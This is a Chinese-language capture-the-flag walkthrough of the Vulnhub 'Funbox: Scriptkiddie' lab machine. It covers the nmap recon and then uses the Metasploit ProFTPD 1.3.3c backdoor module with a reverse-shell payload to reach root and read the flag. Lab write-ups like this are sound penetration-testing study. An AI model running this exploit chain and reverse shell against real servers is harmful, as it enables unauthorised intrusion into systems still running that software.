Vulnhub之Funbox 11 (Scriptkiddie)靶机测试过程
Funbox 11 (Scriptkiddie)
作者:jason_huawen
靶机信息
名称:Funbox: Scriptkiddie
地址:
https://www.vulnhub.com/entry/funbox-scriptkiddie,725/
识别目标主机IP地址
─(kali㉿kali)-[~/Vulnhub/Funbox11]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:5c:67:d7 1 60 PCS Systemtechnik GmbH
192.168.56.208 08:00:27:4b:7d:cc 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.208
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Funbox11]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.208 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-08 07:51 EST
Nmap scan report for 192.168.56.208
Host is up (0.00011s latency).
Not shown: 65527 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.3c
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a60e30353bef4344f51cd7c658640992 (RSA)
| 256 c2d8bd62bf138928f861e0a6c4f7a5bf (ECDSA)
|_ 256 12606e58eef2bd9cffb03505830871b8 (ED25519)
25/tcp open smtp Postfix smtpd
| ssl-cert: Subject: commonName=funbox11
| Not valid before: 2021-07-19T16:52:14
|_Not valid after: 2031-07-17T16:52:14
|_ssl-date: TLS randomness does not represent time
|_smtp-commands: funbox11, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-generator: WordPress 5.7.2
|_http-title: Funbox: Scriptkiddie
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: TOP SASL PIPELINING CAPA UIDL RESP-CODES AUTH-RESP-CODE
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: more LOGIN-REFERRALS capabilities have post-login ID OK listed ENABLE SASL-IR Pre-login LOGINDISABLEDA0001 IDLE IMAP4rev1 LITERAL+
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
MAC Address: 08:00:27:4B:7D:CC (Oracle VirtualBox virtual NIC)
Service Info: Hosts: funbox11, FUNBOX11; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: funbox11
| NetBIOS computer name: FUNBOX11\x00
| Domain name: \x00
| FQDN: funbox11
|_ System time: 2023-01-08T13:52:10+01:00
|_nbstat: NetBIOS name: FUNBOX11, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
|_clock-skew: mean: -20m01s, deviation: 34m37s, median: -2s
| smb2-time:
| date: 2023-01-08T12:52:10
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.36 seconds
获得Shell
21端口
┌──(kali㉿kali)-[~/Vulnhub/Funbox11]
└─$ ftp 192.168.56.208
Connected to 192.168.56.208.
220 ProFTPD 1.3.3c Server (ProFTPD Default Installation) [192.168.56.208]
Name (192.168.56.208:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
530 Login incorrect.
ftp: Login failed
ftp> quit
221 Goodbye.
┌──(kali㉿kali)-[~/Vulnhub/Funbox11]
└─$ searchsploit ProFTPD 1.3.3c
------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------- ---------------------------------
ProFTPd 1.3.3c - Compromised Source Backdoor Remote Code Execution | linux/remote/15662.txt
ProFTPd-1.3.3c - Backdoor Command Execution (Metasploit) | linux/remote/16921.rb
------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
FTP不允许匿名访问,但是其版本有漏洞,先看一下是否可以利用该漏洞
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/misc/netsupport_manager_agent 2011-01-08 average No NetSupport Manager Agent Remote Buffer Overflow
1 exploit/linux/ftp/proftp_sreplace 2006-11-26 great Yes ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)
2 exploit/freebsd/ftp/proftp_telnet_iac 2010-11-01 great Yes ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
3 exploit/linux/ftp/proftp_telnet_iac 2010-11-01 great Yes ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)
4 exploit/unix/ftp/proftpd_modcopy_exec 2015-04-22 excellent Yes ProFTPD 1.3.5 Mod_Copy Command Execution
5 exploit/unix/ftp/proftpd_133c_backdoor 2010-12-02 excellent No ProFTPD-1.3.3c Backdoor Command Execution
Interact with a module by name or index. For example info 5, use 5 or use exploit/unix/ftp/proftpd_133c_backdoor
msf6 > use exploit/unix/ftp/proftpd_133c_backdoor
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > show options
Module options (exploit/unix/ftp/proftpd_133c_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Met
asploit
RPORT 21 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set RHOSTS 192.168.56.208
RHOSTS => 192.168.56.208
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > exploit
[-] 192.168.56.208:21 - Exploit failed: A payload has not been selected.
[*] Exploit completed, but no session was created.
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set payload cmd/unix/
set payload cmd/unix/bind_perl set payload cmd/unix/reverse_bash_telnet_ssl
set payload cmd/unix/bind_perl_ipv6 set payload cmd/unix/reverse_perl
set payload cmd/unix/generic set payload cmd/unix/reverse_perl_ssl
set payload cmd/unix/reverse set payload cmd/unix/reverse_ssl_double_telnet
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > show options
Module options (exploit/unix/ftp/proftpd_133c_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.56.208 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Met
asploit
RPORT 21 yes The target port (TCP)
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set LHOST 192.168.56.206
LHOST => 192.168.56.206
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set LPORT 5555
LPORT => 5555
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > exploit
[*] Started reverse TCP double handler on 192.168.56.206:5555
[*] 192.168.56.208:21 - Sending Backdoor Command
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo oMRWoDgpOUFWHMBN;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "oMRWoDgpOUFWHMBN\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.56.206:5555 -> 192.168.56.208:59896) at 2023-01-08 07:57:45 -0500
id
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
root@funbox11:/# cd /root
cd /root
root@funbox11:/root# ls -alh
ls -alh
total 48K
drwx------ 4 root root 4.0K Jul 20 2021 .
drwxr-xr-x 23 root root 4.0K Jul 19 2021 ..
-rw------- 1 root root 5 Jul 20 2021 .bash_history
-rw-r--r-- 1 root root 3.1K Oct 22 2015 .bashrc
drwx------ 2 root root 4.0K Jul 19 2021 .cache
-rw------- 1 root root 149 Jul 20 2021 .mysql_history
drwxr-xr-x 2 root root 4.0K Jul 19 2021 .nano
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 2.3K Jul 20 2021 root.txt
-rw------- 1 root root 4.6K Jul 20 2021 .viminfo
-rw-r--r-- 1 root root 167 Jan 8 12:44 .wget-hsts
root@funbox11:/root# cat root.txt
cat root.txt
$$$$$$$$\ $$\
$$ _____| $$ |
$$ | $$\ $$\ $$$$$$$\ $$$$$$$\ $$$$$$\ $$\ $$\ $$\
$$$$$\ $$ | $$ |$$ __$$\ $$ __$$\ $$ __$$\ \$$\ $$ |\__|
$$ __|$$ | $$ |$$ | $$ |$$ | $$ |$$ / $$ | \$$$$ /
$$ | $$ | $$ |$$ | $$ |$$ | $$ |$$ | $$ | $$ $$< $$\
$$ | \$$$$$$ |$$ | $$ |$$$$$$$ |\$$$$$$ |$$ /\$$\ \__|
\__| \______/ \__| \__|\_______/ \______/ \__/ \__|
$$$$$$\ $$\ $$\ $$\ $$\ $$\ $$\ $$\
$$ __$$\ \__| $$ | $$ | \__| $$ | $$ |\__|
$$ / \__| $$$$$$$\ $$$$$$\ $$\ $$$$$$\ $$$$$$\ $$ | $$\ $$\ $$$$$$$ | $$$$$$$ |$$\ $$$$$$\
\$$$$$$\ $$ _____|$$ __$$\ $$ |$$ __$$\\_$$ _| $$ | $$ |$$ |$$ __$$ |$$ __$$ |$$ |$$ __$$\
\____$$\ $$ / $$ | \__|$$ |$$ / $$ | $$ | $$$$$$ / $$ |$$ / $$ |$$ / $$ |$$ |$$$$$$$$ |
$$\ $$ |$$ | $$ | $$ |$$ | $$ | $$ |$$\ $$ _$$< $$ |$$ | $$ |$$ | $$ |$$ |$$ ____|
\$$$$$$ |\$$$$$$$\ $$ | $$ |$$$$$$$ | \$$$$ |$$ | \$$\ $$ |\$$$$$$$ |\$$$$$$$ |$$ |\$$$$$$$\
\______/ \_______|\__| \__|$$ ____/ \____/ \__| \__|\__| \_______| \_______|\__| \_______|
$$ |
$$ |
\__|
Please, tweet this to: @0815R2d2
Thank you...
root@funbox11:/root#
直接利用Metasploit工具即可实现root shell.
甚至其他的端口都不需要进行分析了,哈哈。
STRIVE FOR PROGRESS,NOT FOR PERFECTION
